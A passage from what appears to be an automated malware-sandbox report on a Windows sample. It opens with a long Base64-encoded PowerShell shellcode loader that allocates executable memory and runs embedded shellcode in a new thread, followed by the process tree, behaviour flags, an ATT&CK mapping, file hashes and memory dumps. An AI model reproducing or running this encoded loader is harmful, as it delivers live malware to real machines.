HIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUwBCAGEANQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAYgBhACwAMAB4AGMAZAAsADAAeAAwADYALAAwAHgAYQBiACwAMAB4AGIAMgAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxAGEALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4ADMAOAAsADAAeABmAGEALAAwAHgANAAzACwAMAB4ADMAMAAsADAAeABjADIALAAwAHgAMAAzACwAMAB4ADkANAAsADAAeAA1ADUALAAwAHgANABiACwAMAB4AGUANgAsADAAeABhADUALAAwAHgANQA1ACwAMAB4ADIAZgAsADAAeAA2ADIALAAwAHgAOQA1ACwAMAB4ADYANQAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADEAYQAsADAAeAAwAGQALAAwAHgANgA4ACwAMAB4AGQAMwAsADAAeABhADkALAAwAHgANgAzACwAMAB4AGEANAAsADAAeABkADQALAAwAHgAMQBhACwAMAB4AGMAOQAsADAAeAA5ADIALAAwAHgAZABiACwAMAB4ADkAYgAsADAAeAA2ADIALAAwAHgAZQA2ACwAMAB4ADcAYQAsADAAeAAxADgALAAwAHgANwA5ACwAMAB4ADMAYQAsADAAeAA1AGQALAAwAHgAMgAxACwAMAB4AGIAMgAsADAAeAA0AGYALAAwAHgAOQBjACwAMAB4ADYANgAsADAAeABhAGYALAAwAHgAYgBkACwAMAB4AGMAYwAsADAAeAAzAGYALAAwAHgAYgBiACwAMAB4ADEAMwAsADAAeABlADEALAAwAHgAMwA0ACwAMAB4AGYAMQAsADAAeABhAGYALAAwAHgAOABhACwAMAB4ADAANwAsADAAeAAxADcALAAwAHgAYgA3ACwAMAB4ADYAZgAsADAAeABkAGYALAAwAHgAMQA2ACwAMAB4ADkANgAsADAAeAAyADEALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeAAzADgALAAwAHgAYwAzACwAMAB4AGIAOAAsADAAeABmADkALAAwAHgANwAxACwAMAB4AGQAYgAsADAAeABkAGQALAAwAHgAYwA0ACwAMAB4AGMAOAAsADAAeAA1ADAALAAwAHgAMQA1ACwAMAB4AGIAMgAsADAAeABjAGIALAAwAHgAYgAwACwAMAB4ADYANwAsADAAeAAzAGIALAAwAHgANgA3ACwAMAB4AGYAZAAsADAAeAA0ADcALAAwAHgAYwBlACwAMAB4ADcANgAsADAAeAAzADkALAAwAHgANgBmACwAMAB4ADMAMQAsADAAeAAwAGQALAAwAHgAMwAzACwAMAB4ADkAMwAsADAAeABjAGMALAAwAHgAMQA1ACwAMAB4ADgAMAAsADAAeABlADkALAAwAHgAMABhACwAMAB4ADkAMAAsADAAeAAxADMALAAwAHgANAA5ACwAMAB4AGQAOAAsADAAeAAwADIALAAwAHgAZgA4ACwAMAB4ADYAYgAsADAAeAAwAGQALAAwAHgAZAA0ACwAMAB4ADgAYgAsADAAeAA2ADAALAAwAHgAZgBhACwAMAB4ADkAMwAsADAAeABkADQALAAwAHgANgA0ACwAMAB4AGYAZAAsADAAeAA3ADAALAAwAHgANgBmACwAMAB4ADkAMAAsADAAeAA3ADYALAAwAHgANwA3ACwAMAB4AGEAMAAsADAAeAAxADAALAAwAHgAYwBjACwAMAB4ADUAMwAsADAAeAA2ADQALAAwAHgANwA4ACwAMAB4ADkANgAsADAAeABmAGEALAAwAHgAMwBkACwAMAB4ADIANAAsADAAeAA3ADkALAAwAHgAMAAzACwAMAB4ADUAZAAsADAAeAA4ADcALAAwAHgAMgA2ACwAMAB4AGEAMQAsADAAeAAxADUALAAwAHgAMgBhACwAMAB4ADMAMgAsADAAeABkADgALAAwAHgANwA3ACwAMAB4ADIAMwAsADAAeABmADcALAAwAHgAZAAwACwAMAB4ADgANwAsADAAeABiADMALAAwAHgAOQBmACwAMAB4ADYAMwAsADAAeABmAGIALAAwAHgAOAAxACwAMAB4ADAAMAAsADAAeABkAGYALAAwAHgAOQAzACwAMAB4AGEAOQAsADAAeABjADkALAAwAHgAZgA5ACwAMAB4ADYANAAsADAAeABiAGIALAAwAHgAZABlACwAMAB4AGYAYQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADgAZQAsADAAeAAwADUALAAwAHgAMwBjACwAMAB4ADcANAAsADAAeAA4ADYALAAwAHgAYwAxACwAMAB4ADYAOAAsADAAeAAyADQALAAwAHgAYgAwACwAMAB4AGUAMAAsADAAeAAxADAALAAwAHgAYQBmACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAYwA1ACwAMAB4ADUAYQAsADAAeAA0AGIALAAwAHgAOQA5ACwAMAB4ADIANgAsADAAeAAzADIALAAwAHgAZAAyACwAMAB4AGMAYgAsADAAeABjAGYALAAwAHgANAAxACwAMAB4AGUANQAsADAAeABjAGMALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeAAwADMALAAwAHgANAAyACwAMAB4ADQAZgAsADAAeAA5AGYALAAwAHgAOQBiACwAMAB4ADIAMgAsADAAeAAzAGYALAAwAHgANQBmACwAMAB4ADQAYwAsADAAeABjAGEALAAwAHgANQA1ACwAMAB4ADUAMAAsADAAeABiADMALAAwAHgAZQBhACwAMAB4ADUANQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAMAAsADAAeABiADkALAAwAHgAMQAzACwAMAB4AGIANAAsADAAeAAzAGMALAAwAHgAMgAzACwAMAB4ADMAZQAsADAAeAA0AGUALAAwAHgAZABkACwAMAB4AGEAYwAsADAAeAA5ADQALAAwAHgAMgBhACwAMAB4AGQAZAAsADAAeAAyADcALAAwAHgAMQBiACwAMAB4AGMAYQAsADAAeAA5ADMALAAwAHgAYwBmACwAMAB4ADUANgAsADAAeABkADgALAAwAHgANAAzACwAMAB4ADIAMAAsADAAeAAyAGQALAAwAHgAOAAyACwAMAB4AGMANQAsADAAeAAzAGYALAAwAHgAOQBiACwAMAB4AGEAOQAsADAAeABlADkALAAwAHgAZAA1ACwAMAB4ADIAMAAsADAAeAA3ADgALAAwAHgAYgBlACwAMAB4ADQAMQAsADAAeAAyAGIALAAwAHgANQBkACwAMAB4ADgAOAAsADAAeABjAGQALAAwAHgAZAA0ACwAMAB4ADgAOAAsADAAeAA4ADMALAAwAHgAYwA0ACwAMAB4ADQAMAAsADAAeAA3ADMALAAwAHgAZgBiACwAMAB4ADIAOAAsADAAeAA4ADUALAAwAHgANwAzACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAYwBmACwAMAB4ADcAMwAsADAAeAA5ADMALAAwAHgAMgA2ACwAMAB4AGEAYgAsADAAeAAyADcALAAwAHgAOAA2ACwAMAB4ADIAOAAsADAAeAA2ADYALAAwAHgANQA0ACwAMAB4ADEAYgAsADAAeABiAGQALAAwAHgAOAA5ACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADMALAAwAHgAMwA3ACwAMAB4ADUAMAAsADAAeABhAGQALAAwAHgANABjACwAMAB4ADEAMgAsADAAeAA2ADAALAAwAHgAOQAxACwAMAB4ADkAYQAsADAAeAA1AGEALAAwAHgAMQA2ACwAMAB4AGYAYgAsADAAeAAxAGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGwAYgA1ADgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGwAYgA1ADgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGwAYgA1ADgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iokatptb.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD64.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFD63.tmp"
5⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\original.exe
"C:\Users\Admin\AppData\Local\Temp\original.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1052

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFD64.tmp
Filesize
1KB

MD5
00c52afa1b84be52e40c9ac54c46d056

SHA1
856ed395e6bc1def5aff23c61e45632604315c6f

SHA256
4e2e54ffab99c686128b53bc2ecffdae219f48ea70de937f7b1d9fd969e69117

SHA512
07535bc9f1080c14867618ddcd191fb0ce1e0165f387d3366ebbcd4d5da8a6f46fe29b1fe67d1b6a55040c3579790197df4d9f94e67d1f43b8b63dc6bb7442f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\iokatptb.dll
Filesize
3KB

MD5
e517c518daed306d35677d17aac29307

SHA1
ec79af4bd2c06bf143fb2bcd1ce58d040ebf614f

SHA256
711ce6f96ade422a4b53c87b50db655eb5984f4f522b4217d5417597efda542a

SHA512
f45ee3dbaa1893d92d3bfd4df8e6882d595f68b95b2ebc5ea0221fd3ad8186fc493b411ad04456ed17298a2475d9b1f6dba316ff91bd8b943f50a6652516de3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\iokatptb.pdb
Filesize
7KB

MD5
620f0e26614a61c73c2a1e6ca6551c5c

SHA1
a8299357e19063a4fe0aa9a74720b7c8a1ab5b2c

SHA256
b95680c5f5f205f59fe6e69fe63fc6e78c001f26721fba7adb86943450825649

SHA512
9b500d2466bb09e88cdba79de703fdc3d5da91c0d33d3964d428a97c4cc2d0c9377e8ca7cccadeca13683819d98de996713c6494b27ffd27035a2434845e306e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8685829a9308d28eb70561b90eedb167

SHA1
dd57e073a077f3070f6a0efb90bb5029d93fc9bf

SHA256
7263adb90f0d26548b0a9b17ce2c81b3d5856bbb49ea7b38ff8fc7c94a441e92

SHA512
a85ad4d2ac46837cd053b549a61e6ec63178022ee3bad296ffde5cca7eb992e07c2439b8364a40e3cd798c5a01b0c0b590d6902c4ce98a7a99d2702ff08deff2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFD63.tmp
Filesize
652B

MD5
611ec6a85ff84c471cf1da2cf0b4326e

SHA1
87e375f4bb0cd85d1e7bd9019ca05bee8a04b6a8

SHA256
f992296246afc75bfb6be48ee08a3a536b19be67b1da13e8f2a3b87c9ea46ac1

SHA512
56c8f64b97de82660803b97b6ca3e102e3328b80c830a09f7a00919b9b84d28467c4f5f677306110e427d221c48235a28bfca4a6ea0372e4f37de7fb2e734f7e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iokatptb.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iokatptb.cmdline
Filesize
309B

MD5
530a8488bf53c1380d0afb4bdc9cba12

SHA1
119bcde936f60248823891e3877052a9748451e4

SHA256
40486265f708de766c589717a725b39f1a94ffc1b3b7f71c4fa2be41ce890278

SHA512
7afe3de753c9ef7ccb15016ab11a753b8a210359422b810c8aa8c6e33049e5dfc9c500edf77e5162dbc678f5752bc2597395959745f8d90e4d176fc504d2cd1b

Download Submit
memory/520-70-0x0000000000000000-mapping.dmp

Download
memory/912-57-0x000007FEF3F00000-0x000007FEF4A5D000-memory.dmp

Filesize
11.4MB

Download
memory/912-55-0x0000000000000000-mapping.dmp

Download
memory/912-65-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/912-66-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1052-54-0x000007FEFC5C1000-0x000007FEFC5C3000-memory.dmp

Filesize
8KB

Download
memory/1056-61-0x000007FEF3F00000-0x000007FEF4A5D000-memory.dmp

Filesize
11.4MB

Download
memory/1056-67-0x0000000002804000-0x0000000002807000-memory.dmp

Filesize
12KB

Download
memory/1056-68-0x000000000280B000-0x000000000282A000-memory.dmp

Filesize
124KB

Download
memory/1056-62-0x000000001B7C0000-0x000000001BABF000-memory.dmp

Filesize
3.0MB

Download
memory/1056-58-0x0000000000000000-mapping.dmp

Download
memory/1308-73-0x0000000000000000-mapping.dmp

Download
memory/2020-69-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/2020-63-0x0000000000000000-mapping.dmp

Download
memory/2020-64-0x0000000076C81000-0x0000000076C83000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing